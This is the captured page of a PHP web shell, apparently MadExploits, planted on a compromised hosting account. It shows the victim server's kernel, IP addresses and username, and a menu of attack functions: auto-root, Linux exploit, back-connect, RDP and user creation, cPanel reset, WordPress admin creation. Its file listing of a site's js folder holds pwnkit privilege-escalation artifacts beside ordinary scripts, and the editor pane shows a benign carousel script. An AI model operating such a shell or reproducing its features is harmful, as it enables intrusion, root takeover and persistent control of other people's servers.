Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.146.176.1
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Refinance /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
active.js
4.5
KB
-rw-r--r--
bootstrap.min.js
49.94
KB
-rw-r--r--
jquery-3.3.1.min.js
84.89
KB
-rw-r--r--
menumaker.js
3.3
KB
-rw-r--r--
owl.carousel.min.js
41.76
KB
-rw-r--r--
popper.min.js
18.59
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
slider.js
1.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : slider.js
(function($) { 'use strict'; // Declare Carousel jquery object var owl = $('.active-main-slider'); // Carousel initialization owl.owlCarousel({ items: 1, nav: true, loop: true, autoplay: true, navText: ["<i class='fa fa-angle-left'></i>", "<i class='fa fa-angle-right'></i>"], smartSpeed: 1000 }); // add animate.css class(es) to the elements to be animated function setAnimation(_elem, _InOut) { // Store all animationend event name in a string. // cf animate.css documentation var animationEndEvent = 'webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend'; _elem.each(function() { var $elem = $(this); var $animationType = 'animated ' + $elem.data('animation-' + _InOut); $elem.addClass($animationType).one(animationEndEvent, function() { $elem.removeClass($animationType); // remove animate.css Class at the end of the animations }); }); } // Fired before current slide change owl.on('change.owl.carousel', function(event) { var $currentItem = $('.owl-item', owl).eq(event.item.index); var $elemsToanim = $currentItem.find("[data-animation-out]"); setAnimation($elemsToanim, 'out'); }); // Fired after current slide has been changed var round = 0; owl.on('changed.owl.carousel', function(event) { var $currentItem = $('.owl-item', owl).eq(event.item.index); var $elemsToanim = $currentItem.find("[data-animation-in]"); setAnimation($elemsToanim, 'in'); }); })(jQuery);
Close